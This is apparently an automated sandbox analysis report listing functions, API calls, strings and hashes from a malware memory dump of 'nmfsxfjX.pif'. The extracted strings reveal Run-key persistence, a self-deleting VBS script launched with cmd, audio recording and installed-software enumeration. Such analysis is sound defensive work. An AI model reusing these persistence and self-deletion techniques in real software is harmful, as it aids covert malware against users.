                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                        • API String ID: 1861856835-332907002
                                                                                        • Opcode ID: 4dd51f9d9474aff828aae78cf0449dadfc192e0bcfa601c76ee246fd980b7321
                                                                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                                        • Opcode Fuzzy Hash: 4dd51f9d9474aff828aae78cf0449dadfc192e0bcfa601c76ee246fd980b7321
                                                                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                                        • ExitProcess.KERNEL32 ref: 0040D419
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                                        • API String ID: 3797177996-2557013105
                                                                                        • Opcode ID: be73156ffd57c3f649cc91e4c93651d7f35cc94004796a8fa12775aefd0dfa7f
                                                                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                                        • Opcode Fuzzy Hash: be73156ffd57c3f649cc91e4c93651d7f35cc94004796a8fa12775aefd0dfa7f
                                                                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                                        • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                        • API String ID: 2649220323-436679193
                                                                                        • Opcode ID: 41acead5e00a0d3b02ed220858109bffcea00a40e5874d1294efd922ef337f81
                                                                                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                                        • Opcode Fuzzy Hash: 41acead5e00a0d3b02ed220858109bffcea00a40e5874d1294efd922ef337f81
                                                                                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                                        • SetEvent.KERNEL32 ref: 0041B219
                                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                                        • CloseHandle.KERNEL32 ref: 0041B23A
                                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                        • API String ID: 738084811-2094122233
                                                                                        • Opcode ID: 6ef51392ff8895417ea989398018cdc7f1dc70480f06eceb7defc699de156b83
                                                                                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                                        • Opcode Fuzzy Hash: 6ef51392ff8895417ea989398018cdc7f1dc70480f06eceb7defc699de156b83
                                                                                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Write$Create
                                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                                        • API String ID: 1602526932-4212202414
                                                                                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\Public\Libraries\nmfsxfjX.pif,00000001,0040764D,C:\Users\Public\Libraries\nmfsxfjX.pif,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                        • API String ID: 1646373207-2457946462
                                                                                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                                        • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                                        • _wcslen.LIBCMT ref: 0041C13B
                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                                                        • GetLastError.KERNEL32 ref: 0041C173
                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                                        • GetLastError.KERNEL32 ref: 0041C1D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                        • String ID: ?
                                                                                        • API String ID: 3941738427-1684325040
                                                                                        • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                                        • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                        • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                        • API String ID: 2490988753-1941338355
                                                                                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 3899193279-0
                                                                                        • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                        • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                                        • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                                        • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                                        • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                                                        • API String ID: 1223786279-2576077980
                                                                                        • Opcode ID: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                                                                        • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                                        • Opcode Fuzzy Hash: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                                                                        • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEnumOpen
                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                        • API String ID: 1332880857-3714951968
                                                                                        • Opcode ID: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                                                                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                                        • Opcode Fuzzy Hash: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                                                                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                                        • ExitProcess.KERNEL32 ref: 0041D665
                                                                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
